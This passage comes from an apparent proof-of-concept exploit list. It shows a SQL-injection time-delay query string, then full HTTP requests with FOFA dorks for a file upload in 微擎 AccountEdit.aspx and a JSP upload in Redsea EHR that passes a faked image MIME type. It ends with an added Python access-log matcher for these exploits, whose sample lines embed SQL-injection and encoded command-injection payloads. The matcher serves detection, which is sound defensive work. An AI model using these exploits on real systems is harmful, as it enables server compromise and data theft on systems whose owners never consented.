TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 system AccountEdit arbitrary file upload
FOFA: body="/Widgets/WidgetCollection/"
ASP.NET WebForms page: the POST needs the current __VIEWSTATE and __EVENTVALIDATION values, so fetch the page first and copy them into the upload request. The uploaded file keeps its name and is reachable under /_data/Uploads/.
1. Obtain __VIEWSTATE and __EVENTVALIDATION:
GET /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

2. Replace __VIEWSTATE and __EVENTVALIDATION below with the values from step 1 and submit the form (the bttnUpload value is the button's caption, "上传图片", and is sent as-is):
POST /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

The file is then served at /_data/Uploads/1123.txt

203. Redsea (红海云) EHR PtFjk file upload
FOFA: body="RedseaPlatform"
The fj_file part declares Content-Type image/jpeg but carries a JSP with a .jsp filename; a check on the declared MIME type alone does not stop it. Content-Length 210 corresponds to the body shown.
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type: image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--

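For defenders, the practical use of this list is hunting its request signatures in web-server access logs. The matcher below is an added example, not part of the original list: it canonicalises each logged URL the way the target's router would (percent-decoding, dropping ; path parameters as in entry 197, collapsing /js/../ as in entry 191) and compares it against the paths of entries 189 to 203. Entry 202 is left out because /User/AccountEdit.aspx is an ordinary page that ordinary users post to. The Signature table, its regexes and the log lines are constructed for this example, not vendor data. Access logs carry no POST bodies, so the upload and form-based SQL entries match on path alone and need a body-logging layer (WAF or reverse proxy) for confirmation.

```python
"""Access-log triage for the request signatures in entries 189-203
(added example; not part of the original list).

Web-server access logs keep only the request line, so POST bodies (most of the
SQL and upload payloads above) are invisible here; what *is* visible is the
unusual path or query each PoC must hit. The matcher canonicalises the logged
URL the way the target's router would (percent-decoding, dropping ";" path
parameters as in entry 197, collapsing "/js/../" as in entry 191) before
comparing, so the obfuscated forms in the PoCs do not slip past. The
signature table and the log lines are constructed for this example.
"""
from __future__ import annotations

import posixpath
import re
from dataclasses import dataclass
from typing import Iterable
from urllib.parse import unquote, urlsplit

# Combined/common log format: ip ident user [ts] "METHOD target PROTO" status ...
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)


@dataclass(frozen=True)
class Signature:
    entry: int                      # item number in this list
    path: str                       # canonical path, compared case-insensitively
    methods: tuple[str, ...] = ("GET", "POST")
    query: str | None = None        # regex the decoded query must also match


SIGNATURES = [
    Signature(189, "/xds/deleteStudy.php", query=r"(?i)waitfor|sleep\("),
    Signature(190, "/index.php/admin/Userinfo/poihuoqu", ("POST",)),
    Signature(191, "/CDGServer3/NavigationAjax", ("POST",)),
    Signature(192, "/JoinfApp/EMail/UploadEmailAttr", ("POST",),
              r"(?i)name=[^&]*\.(ashx|aspx|asmx)"),
    Signature(193, "/master/ajaxActions/setSystemTimeAction.php", ("POST",)),
    Signature(194, "/servlet/uploadAttachmentServlet", ("POST",)),
    Signature(195, "/send_order.cgi", ("POST",), r"parameter=operation"),
    Signature(196, "/cas/userCtl/resetPasswordBySuper", ("POST",)),
    Signature(197, "/entsoft/Quotegask_editAction.entweb", query=r"(?i)union|select|'"),
    Signature(198, "/cgi-bin/luci/admin/services/aliyundrive-webdav/query",
              query=r"sid=[^&]*[`;|$]"),
    Signature(199, "/assetsmanager/upload", ("POST",)),
    Signature(200, "/js/player/dmplayer/dmku", query=r"(?i)sleep\(|select|benchmark\("),
    Signature(201, "/newsedit/newsplan/task/binary.do", ("POST",)),
    Signature(203, "/RedseaPlatform/PtFjk.mob", ("POST",), r"method=upload"),
]


def canonical(target: str) -> tuple[str, str]:
    """Return (path, query) roughly as the application's router sees them."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    # Servlet containers treat ";x=y" as a path parameter and ignore it when
    # routing (entry 197 appends ";.js" to the servlet name).
    path = "/".join(seg.split(";", 1)[0] for seg in path.split("/"))
    path = posixpath.normpath(path)       # collapses "/js/../" (entry 191)
    if not path.startswith("/"):
        path = "/" + path
    return path, unquote(parts.query)


def match_line(line: str) -> list[int]:
    """Entry numbers whose signature this log line matches (usually none)."""
    m = _LOG_RE.match(line)
    if not m:
        return []
    path, query = canonical(m["target"])
    hits = []
    for sig in SIGNATURES:
        if m["method"].upper() not in sig.methods:
            continue
        if path.lower() != sig.path.lower():
            continue
        if sig.query and not re.search(sig.query, query):
            continue
        hits.append(sig.entry)
    return hits


def triage(lines: Iterable[str]) -> list[tuple[int, str, str]]:
    """(entry, client ip, raw target) for every matching line, in log order."""
    out = []
    for line in lines:
        m = _LOG_RE.match(line)
        for entry in match_line(line):
            out.append((entry, m["ip"], m["target"]))
    return out


# Constructed log lines: four shaped like the PoCs above, two benign.
SAMPLE_LOG = """\
203.0.113.7 - - [03/Jun/2024:10:12:01 +0800] "GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 512
203.0.113.7 - - [03/Jun/2024:10:12:09 +0800] "POST /CDGServer3/js/../NavigationAjax HTTP/1.1" 200 88
198.51.100.4 - - [03/Jun/2024:10:13:40 +0800] "GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1" 500 0
198.51.100.4 - - [03/Jun/2024:10:14:02 +0800] "GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1" 200 17
192.0.2.9 - - [03/Jun/2024:10:15:00 +0800] "GET /xds/deleteStudy.php?documentUniqueId=42 HTTP/1.1" 200 512
192.0.2.9 - - [03/Jun/2024:10:15:05 +0800] "GET /CDGServer3/index.jsp HTTP/1.1" 200 2048
"""

if __name__ == "__main__":
    for entry, ip, target in triage(SAMPLE_LOG.splitlines()):
        print(f"entry {entry}: {ip} {target[:70]}")
```

Canonicalising before matching is the whole point: a rule that looks for the literal string "/CDGServer3/NavigationAjax" misses entry 191's request, and one that looks for "Quotegask_editAction.entweb?" misses entry 197's. Path-only signatures (190, 193, 194, 196, 199, 201) will also fire on legitimate use of those endpoints, so treat them as pivots for a body-level review rather than as alerts on their own.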